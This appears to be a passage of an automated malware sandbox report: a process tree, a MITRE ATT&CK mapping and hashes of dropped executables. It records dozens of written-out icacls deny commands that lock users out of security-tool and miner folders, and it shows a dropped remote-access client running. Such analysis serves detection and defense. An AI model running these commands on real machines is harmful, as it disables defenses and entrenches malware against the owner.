- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\programdata\DriversI /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4356
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:208
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\programdata\DriversI /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\system32\hs /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4376
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\system32\hs /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:3224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\windows\rss /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2476
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\windows\rss /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\generictools /deny %username%:(OI)(CI)(F)
  2⤵
  PID:960
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:968
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\generictools /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4880
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\PCBooster /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4404
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\PCBooster /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1660
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\unityp /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3600
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\unityp /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3752
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\AMD /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1632
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\AMD /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2716
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xmarin /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5088
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\xmarin /deny Admin:(OI)(CI)(F)
    3⤵
    PID:1200
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\comdev /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2312
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\comdev /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3100
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wupdate /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3728
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4188
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\wupdate /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:748
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\monotype /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3260
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\monotype /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\xpon /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1456
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\xpon /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\wmipr /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2840
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\wmipr /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:828
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\kara /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2560
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\kara /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\syslog /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4824
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\syslog /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:3544
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\temp\wup /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3240
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\temp\wup /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4260
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4688
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\FileSystemDriver /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4364
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\geckof /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1996
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\geckof /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\initwin /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2588
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\initwin /deny Admin:(OI)(CI)(F)
    3⤵
    PID:1128
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Local\packagest /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3592
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Local\packagest /deny Admin:(OI)(CI)(F)
    3⤵
    PID:1976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\subdir /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5108
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\subdir /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3576
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\syscore /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1672
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\syscore /deny Admin:(OI)(CI)(F)
    3⤵
    PID:688
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\windowscore /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1768
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\windowscore /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1968
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1200
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\Macromedia /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3896
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\microsoft software /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4636
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1256
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3728
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\SystemCertificates /deny Admin:(OI)(CI)(F)
    3⤵
    PID:740
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5076
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\microsoft\Speech /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny %username%:(OI)(CI)(F)
  2⤵
  PID:756
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3260
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\coretempapp /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4360
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kryptex /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1796
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\kryptex /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\system /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2400
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\system /deny Admin:(OI)(CI)(F)
    3⤵
    PID:4064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2708
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\WindowsApps /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:3520
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4572
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\WindowsHelper /deny Admin:(OI)(CI)(F)
    3⤵
    PID:1532
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4868
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4540
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\microsoft\windows defender /deny Admin:(OI)(CI)(F)
    3⤵
    PID:960
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4880
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\systemprocess /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:2776
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3524
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\microsoft\network /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:368
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\gplyra /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4924
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\gplyra /deny Admin:(OI)(CI)(F)
    3⤵
    PID:2324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\intel /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5096
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\intel /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:2000
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\app /deny %username%:(OI)(CI)(F)
  2⤵
  PID:516
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\app /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:4624
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\Windows_x64_nheqminer-5c /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:5016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\isminer /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1264
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\isminer /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\systemcare /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2312
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\systemcare /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4980
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2644
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\SIVapp /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\kyubey /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2424
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\kyubey /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:1648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4092
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4964
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\NSCPUCNMINER /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4420
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4700
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:4304
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny %username%:(OI)(CI)(F)
  2⤵
  PID:2680
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\microsoft\windows\system /deny Admin:(OI)(CI)(F)
    3⤵
    - Modifies file permissions
    PID:1464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\performance /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4232
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\performance /deny Admin:(OI)(CI)(F)
    3⤵
    PID:4784
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny %username%:(OI)(CI)(F)
  2⤵
  PID:1928
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\Sysfiles /deny Admin:(OI)(CI)(F)
    3⤵
    PID:4336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny %username%:(OI)(CI)(F)
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\AudioHDriver /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\bvhost /deny %username%:(OI)(CI)(F)
  2⤵
  PID:100
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\bvhost /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4436
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\GoogleSoftware /deny Admin:(OI)(CI)(F)
    3⤵
    PID:3964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\setupsk /deny %username%:(OI)(CI)(F)
  2⤵
  PID:5008
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\setupsk /deny Admin:(OI)(CI)(F)
    3⤵
    PID:4644
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\Svcms /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\Svcms /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3052
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny %username%:(OI)(CI)(F)
  2⤵
  PID:4460
- - C:\Windows\SysWOW64\icacls.exe
    icacls C:\Users\Admin\AppData\Roaming\crmsvc /deny Admin:(OI)(CI)(F)
    3⤵
    - Possible privilege escalation attempt
    PID:1968

C:\Programdata\Windows\rutserv.exe
C:\Programdata\Windows\rutserv.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1540
- C:\Programdata\Windows\rfusclient.exe
  C:\Programdata\Windows\rfusclient.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1284
- - C:\Programdata\Windows\rfusclient.exe
    C:\Programdata\Windows\rfusclient.exe /tray
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: SetClipboardViewer
    PID:4848
- C:\Programdata\Windows\rfusclient.exe
  C:\Programdata\Windows\rfusclient.exe /tray
  2⤵
  - Executes dropped EXE
  PID:5104

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3180

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:4488

C:\Programdata\RealtekHD\taskhostw.exe
C:\Programdata\RealtekHD\taskhostw.exe
1⤵
- Executes dropped EXE
PID:2560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

System Services

T1569

Service Execution

T1569.002

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Check\Check.txt

Filesize
37B

MD5
d043b9a4055bdd9e8f4be4b3da0fcbcb

SHA1
694956bb32f816245ccb048247020f9274859227

SHA256
87ca6b093f27c087dfb62a0bf5eb69c6527aa610af21b3db7245caecfa89581b

SHA512
e7d83f0ebf6b5fc179c61fb282a6fab4b9a982dc759b4f31fec5a35f95a5067d56bc5c22244f6e085496db0e6ebaa88c194c840a8bbb1b30dc7aa2a60318c151

Download Submit
C:\ProgramData\Microsoft\Intel\Logs.exe

Filesize
212KB

MD5
32942d3c314bbdf1620cd88103041704

SHA1
30d0e5acd4cd2d564fc0238bbd6b2817429a1d21

SHA256
a5db8a2bfa0de0450b68df20d485031b84ff1bc05870635614c1753668ea62a4

SHA512
96a50e3ac5209ccf9e98a1489ee5e48c4b3643e5f29ecc0ad4a7ea5fe9d2db2c20969cd599b071833e5ecca6ce01b89416cd0a9555416aa475cc23a69f682c02

Download Submit
C:\ProgramData\Microsoft\Intel\P.exe

Filesize
478KB

MD5
4ef6e64af66845bcf9c1bd324e51517f

SHA1
8f56d5884dd44d875deee14654b081fc407490a7

SHA256
5abc1e7138cd3f9ed1d61b6dd5d505c8898ae9cc7f49e0ee45b93be991f520c8

SHA512
e353f29636a51c5d379aaccf8354e75eaf2a4b90648f63e8becf6a7d9379f3e51bcb7584453e7b3697586396a5e650c12197dcfd7c04e23a3e7bbe011ad1d87c

Download Submit
C:\ProgramData\Microsoft\Intel\R8.exe

Filesize
828KB

MD5
5f431f5ee701e752911ac4b7b164374c

SHA1
42109caf54679e668b792404157dd3ce9dec86de

SHA256
8dfda367599ca982201c273cebf8b7ae03ccdbdec269cf164e814b94b90d0f54

SHA512
1af73a30b0e112b83ca1ea8bf3e822ccaa2bd6518be8e8f07f06a7441323efcd64168033d53989611f725e4f5f57ae10fc0ddc0e7a62dcae21110bc7edb34149

Download Submit
C:\ProgramData\Microsoft\Intel\Vega.exe

Filesize
1.1MB

MD5
92685bfb04ed955d8f963d626883a4d6

SHA1
1e1ffe518101b1b79e3d6a6654f40e4d8b1a348a

SHA256
779ea638cecb0c1b584f159507695810c8af6c467586597207d23f8af5df1919

SHA512
d9b24a3f53bb10841727663ab939928eb6e1bd1e1387c6007c314bebe1c2a42d70c510f5b44955c8c6b463afc672cab7f8f9564c49509ec8486cbf6ff3d1cbfb

Download Submit
C:\ProgramData\Microsoft\Intel\Vegas.exe

Filesize
164KB

MD5
30582dfb10c2eb7deaaa1d99b527f064

SHA1
0dda4940ede6a790ab51b21110017e47fe9e7521

SHA256
6f833c0bf680e2c3d345f10619a872f78ede66871052e3501c5444333afcf70f

SHA512
e920b8ea074f20041a048173a4378e1f93ab44facecbf3484a5e1392ec3b18e3745e20eb39a5968914811340eb49553f6bbc155a48fbce28e1ace3a079d78eb5

Download Submit
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe

Filesize
289KB

MD5
07cfae028935e4a7b515f9e3ae226b74

SHA1
78d22c14b74f9e61c68d9ea5dc7fab999688dbab

SHA256
8ccdad395811424fc6e6f1cb0d2e4365dc917ac1bd952de0f2c2ac4aa1e6b9f8

SHA512
2d2e19b4b4377ab83a743958146d9f8922ea96e4b40d3fd6fd230d027d6025d07e8da2d743a8bc0d5691557540fb3f62372485615d1d0968ada5559106d86de3

Download Submit
C:\ProgramData\Microsoft\Intel\svchost.exe

Filesize
845KB

MD5
70ad47ac024936a6bccfd95567c1edfa

SHA1
e1bbe7726bf970c08c2125a54c78fd479e6995ed

SHA256
56a363311361e03dc395d274de67c2a64068df6b163389be80c7b6736ad0c5da

SHA512
7929024c6af401066a9afc23d4da42b906f293935bc1628aa0fe901fba46ae979de4cb7818a1bfae9532d9a810987fe5209dadb508d42e0495f294f4b10651b4

Download Submit
C:\ProgramData\Microsoft\Intel\winit.exe

Filesize
4.6MB

MD5
d2a13f45e422348e79683468f2d72f48

